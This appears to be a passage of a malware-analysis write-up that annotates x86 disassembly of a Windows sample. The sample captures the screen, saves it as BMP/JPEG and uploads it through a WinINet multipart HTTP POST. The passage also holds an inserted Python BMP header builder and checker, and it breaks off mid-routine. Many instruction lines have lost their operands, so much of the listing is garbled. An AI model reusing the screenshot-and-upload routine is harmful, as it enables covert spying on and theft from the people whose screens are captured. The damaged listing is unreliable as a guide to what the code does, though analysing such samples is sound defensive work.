00402ADD FF75 E8 push dword ptr [ebp-0x18]
00402AE0 FFD7 call edi
00402AE2 68 2000CC00 push 0xCC0020 ; SRCCOPY
00402AE7 53 push ebx
00402AE8 53 push ebx
00402AE9 FF75 0C push dword ptr [ebp+0xC]
00402AEC FF75 FC push dword ptr [ebp-0x4]
00402AEF FF75 F4 push dword ptr [ebp-0xC]
00402AF2 53 push ebx
00402AF3 53 push ebx
00402AF4 FF75 E8 push dword ptr [ebp-0x18]
00402AF7 FF15 44404000 call dword ptr [<&gdi32.BitBlt>] ; gdi32.BitBlt(memDC, 0, 0, w, h, windowDC, 0, 0, SRCCOPY)
00402AFD FF75 D8 push dword ptr [ebp-0x28]
00402B00 FF75 E8 push dword ptr [ebp-0x18]
00402B03 FFD7 call edi
00402B05 6A 2C push 0x2C
00402B07 53 push ebx
00402B08 56 push esi
00402B09 E8 020F0000 call <jmp.&msvcrt.memset>
00402B0E 8B45 F4 mov eax, dword ptr [ebp-0xC]
00402B11 8B3D 40404000 mov edi, dword ptr [<&gdi32.GetDeviceCaps>] ; gdi32.GetDeviceCaps
00402B17 83C4 0C add esp, 0xC
00402B1A 8946 04 mov dword ptr [esi+0x4], eax ; biWidth
00402B1D 8B45 FC mov eax, dword ptr [ebp-0x4]
00402B20 C706 28000000 mov dword ptr [esi], 0x28 ; biSize = sizeof(BITMAPINFOHEADER)
00402B26 6A 0C push 0xC ; BITSPIXEL
00402B28 8946 08 mov dword ptr [esi+0x8], eax ; biHeight
00402B2B FF75 0C push dword ptr [ebp+0xC]
00402B2E 66:C746 0C 0100 mov word ptr [esi+0xC], 0x1 ; biPlanes
00402B34 FFD7 call edi
00402B36 53 push ebx
00402B37 56 push esi
00402B38 53 push ebx
00402B39 66:8946 0E mov word ptr [esi+0xE], ax ; biBitCount = screen depth
00402B3D FF75 FC push dword ptr [ebp-0x4]
00402B40 895E 10 mov dword ptr [esi+0x10], ebx ; biCompression = BI_RGB
00402B43 53 push ebx
00402B44 FF75 EC push dword ptr [ebp-0x14]
00402B47 FF75 0C push dword ptr [ebp+0xC]
00402B4A FF15 3C404000 call dword ptr [<&gdi32.GetDIBits>] ; gdi32.GetDIBits with lpvBits = NULL: only fills in the header
00402B50 395E 14 cmp dword ptr [esi+0x14], ebx ; biSizeImage still 0?
00402B53 75 1A jnz short 00402B6F
00402B55 0FB746 0E movzx eax, word ptr [esi+0xE]
00402B59 0FAF46 04 imul eax, dword ptr [esi+0x4]
00402B5D 83C0 1F add eax, 0x1F
00402B60 6A 08 push 0x8
00402B62 24 E0 and al, 0xE0
00402B64 59 pop ecx
00402B65 99 cdq
00402B66 F7F9 idiv ecx ; stride = ((bpp * width + 31) & ~31) / 8
00402B68 0FAF46 08 imul eax, dword ptr [esi+0x8]
00402B6C 8946 14 mov dword ptr [esi+0x14], eax ; biSizeImage = stride * height
00402B6F 6A 68 push 0x68 ; NUMCOLORS (documented to return -1 for displays deeper than 8 bpp)
00402B71 FF75 0C push dword ptr [ebp+0xC]
00402B74 FFD7 call edi
00402B76 8B4E 14 mov ecx, dword ptr [esi+0x14]
00402B79 8945 F4 mov dword ptr [ebp-0xC], eax
00402B7C 8D0485 36000000 lea eax, dword ptr [eax*4+0x36] ; bfOffBits = 14 + 40 + 4 * NUMCOLORS
00402B83 8B3D 08414000 mov edi, dword ptr [<&kernel32.WriteFile>] ; kernel32.WriteFile
00402B89 8945 CA mov dword ptr [ebp-0x36], eax ; bfOffBits
00402B8C 03C1 add eax, ecx
00402B8E 8945 C2 mov dword ptr [ebp-0x3E], eax ; bfSize = bfOffBits + biSizeImage
00402B91 8D45 E4 lea eax, dword ptr [ebp-0x1C]
00402B94 53 push ebx ; lpOverlapped
00402B95 50 push eax ; lpNumberOfBytesWritten
00402B96 8D45 C0 lea eax, dword ptr [ebp-0x40] ; BITMAPFILEHEADER
00402B99 6A 0E push 0xE ; 14 bytes
00402B9B 50 push eax
00402B9C 894D D4 mov dword ptr [ebp-0x2C], ecx
00402B9F FF75 F8 push dword ptr [ebp-0x8] ; hFile
00402BA2 66:C745 C0 424D mov word ptr [ebp-0x40], 0x4D42 ; bfType = "BM"
00402BA8 66:895D C6 mov word ptr [ebp-0x3A], bx ; bfReserved1 = 0
00402BAC 66:895D C8 mov word ptr , bx
00402BB0 FFD7 call edi
00402BB2 8D45 E4 lea eax, dword ptr
00402BB5 53 push ebx
00402BB6 50 push eax
00402BB7 6A 28 push 0x28
00402BB9 56 push esi
00402BBA FF75 F8 push dword ptr
00402BBD FFD7 call edi
00402BBF 8B45 F4 mov eax, dword ptr
00402BC2 3BC3 cmp eax, ebx
00402BC4 0F84 8F000000 je 00402C59
00402BCA 8D0485 08000000 lea eax, dword ptr
00402BD1 50 push eax
00402BD2 6A 42 push 0x42
00402BD4 FF15 EC404000 call dword ptr [<&kernel32.GlobalAllo>; kernel32.GlobalAlloc
00402BDA 50 push eax
00402BDB 8945 DC mov dword ptr , eax
00402BDE FF15 F0404000 call dword ptr [<&kernel32.GlobalLock>; kernel32.GlobalLock
00402BE4 8B4D F4 mov ecx, dword ptr
00402BE7 8945 E0 mov dword ptr , eax
00402BEA 66:8948 02 mov word ptr , cx
00402BEE 66:C700 0003 mov word ptr , 0x300
00402BF3 83C0 04 add eax, 0x4
00402BF6 50 push eax
00402BF7 51 push ecx
00402BF8 53 push ebx
00402BF9 FF75 0C push dword ptr
00402BFC FF15 38404000 call dword ptr [<&gdi32.GetSystemPale>; gdi32.GetSystemPaletteEntries
00402C02 8B4D F4 mov ecx, dword ptr
00402C05 885D F3 mov byte ptr , bl
00402C08 3BCB cmp ecx, ebx
00402C0A 7E 3B jle short 00402C47
00402C0C 8B45 E0 mov eax, dword ptr
00402C0F 894D E0 mov dword ptr , ecx
00402C12 83C0 05 add eax, 0x5
00402C15 8945 F4 mov dword ptr , eax
00402C18 EB 03 jmp short 00402C1D
00402C1A 8B45 F4 /mov eax, dword ptr
00402C1D 8A48 FF mov cl, byte ptr
00402C20 53 |push ebx
00402C21 884D F2 |mov byte ptr , cl
00402C24 8A08 |mov cl, byte ptr
00402C26 884D F1 |mov byte ptr , cl
00402C29 8A40 01 |mov al, byte ptr
00402C2C 8845 F0 |mov byte ptr , al
00402C2F 8D45 E4 |lea eax, dword ptr
00402C32 50 |push eax
00402C33 8D45 F0 |lea eax, dword ptr
00402C36 6A 04 |push 0x4
00402C38 50 |push eax
00402C39 FF75 F8 |push dword ptr
00402C3C FFD7 |call edi
00402C3E 8345 F4 04 |add dword ptr , 0x4
00402C42 FF4D E0 |dec dword ptr
00402C45^ 75 D3 \jnz short 00402C1A
00402C47 FF75 DC push dword ptr
00402C4A FF15 A4404000 call dword ptr [<&kernel32.GlobalUnlo>; kernel32.GlobalUnlock
00402C50 FF75 DC push dword ptr
00402C53 FF15 A0404000 call dword ptr [<&kernel32.GlobalFree>; kernel32.GlobalFree
00402C59 FF76 14 push dword ptr
00402C5C 6A 42 push 0x42
00402C5E FF15 EC404000 call dword ptr [<&kernel32.GlobalAllo>; kernel32.GlobalAlloc
00402C64 50 push eax
00402C65 8945 DC mov dword ptr , eax
00402C68 FF15 F0404000 call dword ptr [<&kernel32.GlobalLock>; kernel32.GlobalLock
00402C6E 53 push ebx
00402C6F 56 push esi
00402C70 50 push eax
00402C71 8945 E0 mov dword ptr , eax
00402C74 FF75 FC push dword ptr
00402C77 53 push ebx
00402C78 FF75 EC push dword ptr
00402C7B FF75 0C push dword ptr
00402C7E FF15 3C404000 call dword ptr [<&gdi32.GetDIBits>] ; gdi32.GetDIBits
00402C84 8D45 E4 lea eax, dword ptr
00402C87 53 push ebx
00402C88 50 push eax
00402C89 FF75 D4 push dword ptr
00402C8C FF75 E0 push dword ptr
00402C8F FF75 F8 push dword ptr
00402C92 FFD7 call edi
00402C94 FF75 DC push dword ptr
00402C97 8B3D A4404000 mov edi, dword ptr [<&kernel32.Globa>; kernel32.GlobalUnlock
00402C9D FFD7 call edi
00402C9F FF75 DC push dword ptr
00402CA2 8B1D A0404000 mov ebx, dword ptr [<&kernel32.Globa>; kernel32.GlobalFree
00402CA8 FFD3 call ebx
00402CAA 56 push esi
00402CAB FFD7 call edi
00402CAD FF75 D0 push dword ptr
00402CB0 FFD3 call ebx
00402CB2 FF75 D8 push dword ptr
00402CB5 8B35 34404000 mov esi, dword ptr [<&gdi32.DeleteOb>; gdi32.DeleteObject
00402CBB FFD6 call esi
00402CBD FF75 EC push dword ptr
00402CC0 FFD6 call esi
00402CC2 FF75 E8 push dword ptr
00402CC5 FF15 30404000 call dword ptr [<&gdi32.DeleteDC>] ; gdi32.DeleteDC
00402CCB FF75 0C push dword ptr
00402CCE FF75 08 push dword ptr
00402CD1 FF15 78414000 call dword ptr [<&user32.ReleaseDC>]; user32.ReleaseDC
00402CD7 FF75 F8 push dword ptr
00402CDA FF15 0C414000 call dword ptr [<&kernel32.CloseHandl>; kernel32.CloseHandle
00402CE0 6A 01 push 0x1
00402CE2 58 pop eax
00402CE3 5F pop edi
00402CE4 5E pop esi
00402CE5 5B pop ebx
00402CE6 C9 leave
00402CE7 C2 0800 retn 0x8
This screenshot-capture code has circulated widely on the net, for example: http://blog.sina.com.cn/s/blog_55eccf2101009ojy.html
}
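As an added example (not code from the post or from the sample), here is the BMP layout that the screenshot routine above assembles before its WriteFile calls, written as a builder plus a consistency checker an analyst can run over a captured upload. The size arithmetic follows the disassembly (biSizeImage at 00402B55..00402B6C, bfOffBits at 00402B7C, the RGBQUAD byte swap at 00402C1A); the test values are constructed.

```python
import struct

# Added example, not the sample's code: BITMAPFILEHEADER (14 bytes) and
# BITMAPINFOHEADER (40 bytes) as the routine above writes them.
FILE_HDR = "<2sIHHI"        # bfType, bfSize, bfReserved1, bfReserved2, bfOffBits
INFO_HDR = "<IiiHHIIiiII"   # biSize, biWidth, biHeight, biPlanes, biBitCount, biCompression,
                            # biSizeImage, biXPelsPerMeter, biYPelsPerMeter, biClrUsed, biClrImportant

def size_image(width, height, bit_count):
    """biSizeImage exactly as computed at 00402B55..00402B6C:
    ((biBitCount*biWidth + 31) & ~31) / 8 * biHeight, i.e. rows padded to 4 bytes."""
    return ((bit_count * width + 31) & ~0x1F) // 8 * abs(height)

def build_bmp(width, height, bit_count, palette, pixels):
    """palette: list of (r, g, b) as GetSystemPaletteEntries returns them (PALETTEENTRY);
    each is written as RGBQUAD b, g, r, 0 like the byte-swapping loop at 00402C1A."""
    img = size_image(width, height, bit_count)
    if len(pixels) != img:
        raise ValueError("pixel buffer does not match biSizeImage")
    off_bits = 0x36 + 4 * len(palette)      # lea eax, [ecx*4+0x36] at 00402B7C
    info = struct.pack(INFO_HDR, 0x28, width, height, 1, bit_count, 0, img, 0, 0, 0, 0)
    file_hdr = struct.pack(FILE_HDR, b"BM", off_bits + img, 0, 0, off_bits)
    quads = b"".join(bytes((b, g, r, 0)) for r, g, b in palette)
    return file_hdr + info + quads + pixels

def check_bmp(blob):
    """Parse a BMP and verify that its size fields agree with each other and with
    the file length; returns the parsed fields or raises ValueError."""
    if len(blob) < 54:
        raise ValueError("too short for BITMAPFILEHEADER + BITMAPINFOHEADER")
    magic, bf_size, _, _, off_bits = struct.unpack_from(FILE_HDR, blob, 0)
    (bi_size, w, h, planes, bpp, comp, img,
     _, _, clr_used, _) = struct.unpack_from(INFO_HDR, blob, 14)
    if magic != b"BM" or bi_size != 0x28 or planes != 1:
        raise ValueError("not a BITMAPINFOHEADER bitmap")
    expected = size_image(w, h, bpp)
    if img == 0 and comp == 0:
        img = expected                       # BI_RGB writers may leave biSizeImage at 0
    if img != expected:
        raise ValueError("biSizeImage %d != %d" % (img, expected))
    n_colors = (off_bits - 54) // 4
    if off_bits != 54 + 4 * n_colors or bf_size != off_bits + img or len(blob) != bf_size:
        raise ValueError("header sizes inconsistent with file length")
    return {"width": w, "height": h, "bpp": bpp, "colors": n_colors, "size_image": img}

def is_consistent_bmp(blob):
    """Boolean wrapper around check_bmp for quick triage of a captured file."""
    try:
        check_bmp(blob)
        return True
    except ValueError:
        return False
```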
004014C2 |68 00574000 push 00405700 ; image/jpeg
004014C7 |56 push esi
004014C8 |57 push edi
004014C9 |E8 F71E0000 call 004033C5
{
004033C5 55 push ebp
004033C6 8BEC mov ebp, esp
004033C8 81EC 58040000 sub esp, 0x458
004033CE 53 push ebx
004033CF 56 push esi
004033D0 57 push edi
004033D1 68 AC5A4000 push 00405AAC ; ASCII "gdiplus.dll"
004033D6 FF15 D4404000 call dword ptr [<&kernel32.LoadLibrar>; kernel32.LoadLibraryA
004033DC 8BF8 mov edi, eax
004033DE 33DB xor ebx, ebx
004033E0 3BFB cmp edi, ebx
004033E2 0F84 96000000 je 0040347E
004033E8 8B35 B4404000 mov esi, dword ptr [<&kernel32.GetPr>; kernel32.GetProcAddress
004033EE 68 9C5A4000 push 00405A9C ; ASCII "GdiplusStartup"
004033F3 57 push edi
004033F4 FFD6 call esi
004033F6 68 805A4000 push 00405A80 ; ASCII "GdipGetImageEncodersSize"
004033FB 57 push edi
004033FC 8945 F4 mov dword ptr , eax
004033FF FFD6 call esi
00403401 68 685A4000 push 00405A68 ; ASCII "GdipGetImageEncoders"
00403406 57 push edi
00403407 8945 FC mov dword ptr , eax
0040340A FFD6 call esi
0040340C 68 505A4000 push 00405A50 ; ASCII "GdipLoadImageFromFile"
00403411 57 push edi
00403412 8945 DC mov dword ptr , eax
00403415 FFD6 call esi
00403417 68 3C5A4000 push 00405A3C ; ASCII "GdipSaveImageToFile"
0040341C 57 push edi
0040341D 8945 E8 mov dword ptr , eax
00403420 FFD6 call esi
00403422 68 285A4000 push 00405A28 ; ASCII "GdipDisposeImage"
00403427 57 push edi
00403428 8945 E4 mov dword ptr , eax
0040342B FFD6 call esi
0040342D 8945 E0 mov dword ptr , eax
00403430 8D45 CC lea eax, dword ptr
00403433 53 push ebx
00403434 50 push eax
00403435 8D45 C8 lea eax, dword ptr
00403438 895D F0 mov dword ptr , ebx
0040343B 50 push eax
0040343C 895D F8 mov dword ptr , ebx
0040343F C745 CC 0100000>mov dword ptr , 0x1
00403446 895D D0 mov dword ptr , ebx
00403449 895D D4 mov dword ptr , ebx
0040344C 895D D8 mov dword ptr , ebx
0040344F FF55 F4 call dword ptr
00403452 8D45 F8 lea eax, dword ptr
00403455 50 push eax
00403456 8D45 F0 lea eax, dword ptr
00403459 50 push eax
0040345A FF55 FC call dword ptr
0040345D 395D F8 cmp dword ptr , ebx
00403460 74 1C je short 0040347E
00403462 6A 04 push 0x4
00403464 68 00100000 push 0x1000
00403469 FF75 F8 push dword ptr
0040346C 53 push ebx
0040346D 6A FF push -0x1
0040346F FF15 88404000 call dword ptr [<&kernel32.VirtualAll>; kernel32.VirtualAllocEx
00403475 8BF8 mov edi, eax
00403477 3BFB cmp edi, ebx
00403479 897D F4 mov dword ptr , edi
0040347C 75 07 jnz short 00403485
0040347E 33C0 xor eax, eax
00403480 E9 02010000 jmp 00403587
00403485 57 push edi
00403486 FF75 F8 push dword ptr
00403489 FF75 F0 push dword ptr
0040348C FF55 DC call dword ptr
0040348F 395D F0 cmp dword ptr , ebx
00403492 895D FC mov dword ptr , ebx
00403495 76 37 jbe short 004034CE
00403497 8D77 30 lea esi, dword ptr
0040349A FF75 10 /push dword ptr
0040349D FF36 |push dword ptr
0040349F FF15 30414000 |call dword ptr [<&msvcrt.wcscmp>] ; msvcrt.wcscmp
004034A5 59 |pop ecx
004034A6 85C0 |test eax, eax
004034A8 59 |pop ecx
004034A9 74 10 |je short 004034BB
004034AB FF45 FC |inc dword ptr
004034AE 83C6 4C |add esi, 0x4C
004034B1 8B45 FC |mov eax, dword ptr
004034B4 3B45 F0 |cmp eax, dword ptr
004034B7^ 72 E1 \jb short 0040349A
004034B9 EB 13 jmp short 004034CE
004034BB 8B75 FC mov esi, dword ptr
004034BE 8D7D B8 lea edi, dword ptr
004034C1 6BF6 4C imul esi, esi, 0x4C
004034C4 0375 F4 add esi, dword ptr
004034C7 A5 movs dword ptr es:, dword ptr [e>
004034C8 A5 movs dword ptr es:, dword ptr [e>
004034C9 A5 movs dword ptr es:, dword ptr [e>
004034CA A5 movs dword ptr es:, dword ptr [e>
004034CB 8B7D F4 mov edi, dword ptr
004034CE 68 00400000 push 0x4000
004034D3 FF75 F8 push dword ptr
004034D6 57 push edi
004034D7 6A FF push -0x1
004034D9 FF15 A8404000 call dword ptr [<&kernel32.VirtualFre>; kernel32.VirtualFreeEx
004034DF 66:A1 C8654000mov ax, word ptr
004034E5 B9 81000000 mov ecx, 0x81
004034EA 66:8985 B0FDFFF>mov word ptr , ax
004034F1 33C0 xor eax, eax
004034F3 8DBD B2FDFFFF lea edi, dword ptr
004034F9 68 04010000 push 0x104
004034FE F3:AB rep stos dword ptr es:
00403500 66:AB stos word ptr es:
00403502 8D85 B0FDFFFF lea eax, dword ptr
00403508 50 push eax
00403509 FF75 08 push dword ptr
0040350C E8 AF040000 call <jmp.&msvcrt.strlen>
00403511 59 pop ecx
00403512 8B35 B0404000 mov esi, dword ptr [<&kernel32.Multi>; kernel32.MultiByteToWideChar
00403518 50 push eax
00403519 FF75 08 push dword ptr
0040351C 53 push ebx
0040351D 53 push ebx
0040351E FFD6 call esi
00403520 66:A1 C8654000mov ax, word ptr
00403526 B9 81000000 mov ecx, 0x81
0040352B 66:8985 A8FBFFF>mov word ptr , ax
00403532 33C0 xor eax, eax
00403534 8DBD AAFBFFFF lea edi, dword ptr
0040353A 68 04010000 push 0x104
0040353F F3:AB rep stos dword ptr es:
00403541 66:AB stos word ptr es:
00403543 8D85 A8FBFFFF lea eax, dword ptr
00403549 50 push eax
0040354A FF75 0C push dword ptr
0040354D E8 6E040000 call <jmp.&msvcrt.strlen>
00403552 59 pop ecx
00403553 50 push eax
00403554 FF75 0C push dword ptr
00403557 53 push ebx
00403558 53 push ebx
00403559 FFD6 call esi
0040355B 8D45 EC lea eax, dword ptr
0040355E 895D EC mov dword ptr , ebx
00403561 50 push eax
00403562 8D85 B0FDFFFF lea eax, dword ptr
00403568 50 push eax
00403569 FF55 E8 call dword ptr
0040356C 8D45 B8 lea eax, dword ptr
0040356F 53 push ebx
00403570 50 push eax
00403571 8D85 A8FBFFFF lea eax, dword ptr
00403577 50 push eax
00403578 FF75 EC push dword ptr
0040357B FF55 E4 call dword ptr
0040357E FF75 EC push dword ptr
00403581 FF55 E0 call dword ptr
00403584 6A 01 push 0x1
00403586 58 pop eax
00403587 5F pop edi
00403588 5E pop esi
00403589 5B pop ebx
0040358A C9 leave
0040358B C2 0C00 retn 0xC
It fetches the GDI-related APIs, so this is still image processing.
}
OK, enough of this boring stuff; let's look at its network connection part:
Creating the memory-mapped file used for the upload data:
0040233A 55 push ebp
0040233B 8BEC mov ebp, esp
0040233D B8 C8180000 mov eax, 0x18C8
00402342 E8 99160000 call 004039E0
00402347 A0 74644000 mov al, byte ptr
0040234C 53 push ebx
0040234D 56 push esi
0040234E 57 push edi
0040234F 8885 38E7FFFF mov byte ptr , al
00402355 B9 FF040000 mov ecx, 0x4FF
0040235A 33C0 xor eax, eax
0040235C 8DBD 39E7FFFF lea edi, dword ptr
00402362 F3:AB rep stos dword ptr es:
00402364 66:AB stos word ptr es:
00402366 AA stos byte ptr es:
00402367 8D85 38E7FFFF lea eax, dword ptr
0040236D 50 push eax
0040236E 8D85 38FFFFFF lea eax, dword ptr
00402374 50 push eax
00402375 FF75 08 push dword ptr
00402378 E8 37050000 call 004028B4
0040237D 33DB xor ebx, ebx
0040237F 8945 FC mov dword ptr , eax
00402382 3BC3 cmp eax, ebx
00402384 0F84 10010000 je 0040249A
0040238A 6A 5C push 0x5C
0040238C FF75 0C push dword ptr
0040238F FF15 24414000 call dword ptr [<&msvcrt.strrchr>] ; msvcrt.strrchr
00402395 59 pop ecx
00402396 3BC3 cmp eax, ebx
00402398 59 pop ecx
00402399 74 03 je short 0040239E
0040239B 40 inc eax
0040239C EB 03 jmp short 004023A1
0040239E 8B45 0C mov eax, dword ptr
004023A1 50 push eax
004023A2 8D85 38FBFFFF lea eax, dword ptr
004023A8 68 74584000 push 00405874 ; fileupload\n\ncontent-disposition: form-data; name="file1"; filename="%s"\n\ncontent-type: image/bmp\n\n\n\n
004023AD 50 push eax
004023AE FF15 28414000 call dword ptr [<&msvcrt.sprintf>] ; msvcrt.sprintf
004023B4 BE 60584000 mov esi, 00405860 ; \n\nfileupload--\n\n
004023B9 8D7D D8 lea edi, dword ptr
004023BC A5 movs dword ptr es:, dword ptr [e>
004023BD A5 movs dword ptr es:, dword ptr [e>
004023BE A5 movs dword ptr es:, dword ptr [e>
004023BF A5 movs dword ptr es:, dword ptr [e>
004023C0 6A 08 push 0x8
004023C2 8D45 C1 lea eax, dword ptr
004023C5 59 pop ecx
004023C6 FF75 18 push dword ptr
004023C9 A4 movs byte ptr es:, byte ptr [esi>
004023CA BE 40584000 mov esi, 00405840 ; referer:
004023CF 8D7D B8 lea edi, dword ptr
004023D2 F3:A5 rep movs dword ptr es:, dword p>
004023D4 50 push eax
004023D5 E8 F2150000 call <jmp.&msvcrt._mbscpy>
004023DA 83C4 14 add esp, 0x14
004023DD 8D45 B8 lea eax, dword ptr
004023E0 C745 F0 0858400>mov dword ptr , 00405808 ; content-type: multipart/form-data;boundary=fileupload
004023E7 8945 F4 mov dword ptr , eax
004023EA 53 push ebx
004023EB 53 push ebx
004023EC 6A 03 push 0x3
004023EE 53 push ebx
004023EF 6A 01 push 0x1
004023F1 68 00000080 push 0x80000000
004023F6 FF75 0C push dword ptr
004023F9 895D 18 mov dword ptr , ebx
004023FC FF15 00414000 call dword ptr [<&kernel32.CreateFile>; kernel32.CreateFileA
00402402 83F8 FF cmp eax, -0x1
00402405 8945 08 mov dword ptr , eax
00402408 0F84 8C000000 je 0040249A
0040240E 53 push ebx
0040240F 50 push eax
00402410 FF15 F8404000 call dword ptr [<&kernel32.GetFileSiz>; kernel32.GetFileSize
00402416 8945 0C mov dword ptr , eax
00402419 8D85 38FBFFFF lea eax, dword ptr
0040241F 50 push eax
00402420 E8 9B150000 call <jmp.&msvcrt.strlen>
00402425 8BF8 mov edi, eax
00402427 8D45 D8 lea eax, dword ptr
0040242A 50 push eax
0040242B E8 90150000 call <jmp.&msvcrt.strlen>
00402430 59 pop ecx
00402431 8D3438 lea esi, dword ptr
00402434 0375 0C add esi, dword ptr
00402437 59 pop ecx
00402438 6A 04 push 0x4
0040243A 68 00100000 push 0x1000
0040243F 56 push esi
00402440 53 push ebx
00402441 6A FF push -0x1
00402443 8945 F8 mov dword ptr , eax
00402446 FF15 88404000 call dword ptr [<&kernel32.VirtualAll>; kernel32.VirtualAllocEx
0040244C 8BD8 mov ebx, eax
0040244E 85DB test ebx, ebx
00402450 74 3B je short 0040248D
00402452 8D85 38FBFFFF lea eax, dword ptr
00402458 57 push edi
00402459 50 push eax
0040245A 53 push ebx
0040245B E8 66150000 call <jmp.&msvcrt.memcpy>
00402460 83C4 0C add esp, 0xC
00402463 8D45 EC lea eax, dword ptr
00402466 03FB add edi, ebx
00402468 6A 00 push 0x0
0040246A 50 push eax
0040246B FF75 0C push dword ptr
0040246E 57 push edi
0040246F FF75 08 push dword ptr
00402472 FF15 FC404000 call dword ptr [<&kernel32.ReadFile>] ; kernel32.ReadFile
00402478 FF75 F8 push dword ptr
0040247B 8D45 D8 lea eax, dword ptr
0040247E 50 push eax
0040247F 8B45 0C mov eax, dword ptr
00402482 03F8 add edi, eax
00402484 57 push edi
00402485 E8 3C150000 call <jmp.&msvcrt.memcpy>
0040248A 83C4 0C add esp, 0xC
0040248D FF75 08 push dword ptr
00402490 FF15 0C414000 call dword ptr [<&kernel32.CloseHandl>; kernel32.CloseHandle
00402496 85DB test ebx, ebx
00402498 75 04 jnz short 0040249E
0040249A 33C0 xor eax, eax
0040249C EB 3F jmp short 004024DD
0040249E FF75 FC push dword ptr
004024A1 8D45 F0 lea eax, dword ptr
004024A4 6A 01 push 0x1
004024A6 5F pop edi
004024A7 57 push edi
004024A8 FF75 14 push dword ptr
004024AB FF75 10 push dword ptr
004024AE 56 push esi
004024AF 53 push ebx
004024B0 6A 02 push 0x2
004024B2 50 push eax
004024B3 8D85 38E7FFFF lea eax, dword ptr
004024B9 50 push eax
004024BA 8D85 38FFFFFF lea eax, dword ptr
004024C0 50 push eax
004024C1 E8 FBFCFFFF call 004021C1
004024C6 85C0 test eax, eax
004024C8 74 03 je short 004024CD
004024CA 897D 18 mov dword ptr , edi
004024CD 68 00400000 push 0x4000
004024D2 56 push esi
004024D3 53 push ebx
004024D4 FF15 10414000 call dword ptr [<&kernel32.VirtualFre>; kernel32.VirtualFree
004024DA 8B45 18 mov eax, dword ptr
004024DD 5F pop edi
004024DE 5E pop esi
004024DF 5B pop ebx
004024E0 C9 leave
004024E1 C2 1400 retn 0x14
OK, now let's look at the upload and download part:
004021C1 55 push ebp
004021C2 8BEC mov ebp, esp
004021C4 83EC 34 sub esp, 0x34
004021C7 53 push ebx
004021C8 56 push esi
004021C9 33F6 xor esi, esi
004021CB 33DB xor ebx, ebx
004021CD 56 push esi
004021CE 56 push esi
004021CF 56 push esi
004021D0 56 push esi
004021D1 68 00584000 push 00405800 ; wininet
004021D6 FF15 A8414000 call dword ptr [<&wininet.InternetOpe>; wininet.InternetOpenA
004021DC 3BC6 cmp eax, esi
004021DE 8945 F4 mov dword ptr , eax
004021E1 0F84 4B010000 je 00402332
004021E7 56 push esi
004021E8 56 push esi
004021E9 6A 03 push 0x3
004021EB 56 push esi
004021EC 56 push esi
004021ED FF75 2C push dword ptr
004021F0 FF75 08 push dword ptr
004021F3 50 push eax
004021F4 FF15 A4414000 call dword ptr [<&wininet.InternetCon>; wininet.InternetConnectA
004021FA 3BC6 cmp eax, esi
004021FC 8945 F8 mov dword ptr , eax
004021FF 0F84 24010000 je 00402329
00402205 3975 28 cmp dword ptr , esi
00402208 B8 F8574000 mov eax, 004057F8 ; post
0040220D 75 05 jnz short 00402214
0040220F B8 F4574000 mov eax, 004057F4 ; get
00402214 56 push esi
00402215 56 push esi
00402216 56 push esi
00402217 56 push esi
00402218 56 push esi
00402219 FF75 0C push dword ptr
0040221C 50 push eax
0040221D FF75 F8 push dword ptr
00402220 FF15 A0414000 call dword ptr [<&wininet.HttpOpenReq>; wininet.HttpOpenRequestA
00402226 3BC6 cmp eax, esi
00402228 8945 2C mov dword ptr , eax
0040222B 0F84 EF000000 je 00402320
00402231 57 push edi
00402232 6A 09 push 0x9
00402234 59 pop ecx
00402235 33C0 xor eax, eax
00402237 8D7D D0 lea edi, dword ptr
0040223A F3:AB rep stos dword ptr es:
0040223C 8B7D 10 mov edi, dword ptr
0040223F 8B45 1C mov eax, dword ptr
00402242 3BFE cmp edi, esi
00402244 C745 CC 2800000>mov dword ptr , 0x28
0040224B 8945 E8 mov dword ptr , eax
0040224E 74 2B je short 0040227B
00402250 8B45 14 mov eax, dword ptr
00402253 3BC6 cmp eax, esi
00402255 7E 24 jle short 0040227B
00402257 8945 08 mov dword ptr , eax
0040225A 68 00000020 /push 0x20000000
0040225F FF37 |push dword ptr
00402261 E8 5A170000 |call <jmp.&msvcrt.strlen>
00402266 59 |pop ecx
00402267 50 |push eax
00402268 FF37 |push dword ptr
0040226A FF75 2C |push dword ptr
0040226D FF15 9C414000 |call dword ptr [<&wininet.HttpAddReq>; wininet.HttpAddRequestHeadersA
00402273 83C7 04 |add edi, 0x4
00402276 FF4D 08 |dec dword ptr
00402279^ 75 DF \jnz short 0040225A
0040227B 56 push esi
0040227C 56 push esi
0040227D 8D45 CC lea eax, dword ptr
00402280 56 push esi
00402281 50 push eax
00402282 FF75 2C push dword ptr
00402285 FF15 98414000 call dword ptr [<&wininet.HttpSendReq>; wininet.HttpSendRequestExA
0040228B 85C0 test eax, eax
0040228D BF 00280000 mov edi, 0x2800
00402292 74 3B je short 004022CF
00402294 3975 18 cmp dword ptr , esi
00402297 74 36 je short 004022CF
00402299 33DB xor ebx, ebx
0040229B 3975 1C cmp dword ptr , esi
0040229E 76 2F jbe short 004022CF
004022A0 8B45 1C /mov eax, dword ptr
004022A3 8975 FC |mov dword ptr , esi
004022A6 2BC3 |sub eax, ebx
004022A8 3BC7 |cmp eax, edi
004022AA 76 02 |jbe short 004022AE
004022AC 8BC7 |mov eax, edi
004022AE 8D4D FC |lea ecx, dword ptr
004022B1 51 |push ecx
004022B2 50 |push eax
004022B3 8B45 18 |mov eax, dword ptr
004022B6 03C3 |add eax, ebx
004022B8 50 |push eax
004022B9 FF75 2C |push dword ptr
004022BC FF15 94414000 |call dword ptr [<&wininet.InternetWr>; wininet.InternetWriteFile
004022C2 3975 FC |cmp dword ptr , esi
004022C5 74 08 |je short 004022CF
004022C7 035D FC |add ebx, dword ptr
004022CA 3B5D 1C |cmp ebx, dword ptr
004022CD^ 72 D1 \jb short 004022A0
004022CF 56 push esi
004022D0 56 push esi
004022D1 56 push esi
004022D2 FF75 2C push dword ptr
004022D5 FF15 B4414000 call dword ptr [<&wininet.HttpEndRequ>; wininet.HttpEndRequestA
004022DB 3975 20 cmp dword ptr , esi
004022DE 74 36 je short 00402316
004022E0 33DB xor ebx, ebx
004022E2 3975 24 cmp dword ptr , esi
004022E5 76 2F jbe short 00402316
004022E7 8B45 24 /mov eax, dword ptr
004022EA 8975 FC |mov dword ptr , esi
004022ED 2BC3 |sub eax, ebx
004022EF 3BC7 |cmp eax, edi
004022F1 76 02 |jbe short 004022F5
004022F3 8BC7 |mov eax, edi
004022F5 8D4D FC |lea ecx, dword ptr
004022F8 51 |push ecx
004022F9 50 |push eax
004022FA 8B45 20 |mov eax, dword ptr
004022FD 03C3 |add eax, ebx
004022FF 50 |push eax
00402300 FF75 2C |push dword ptr
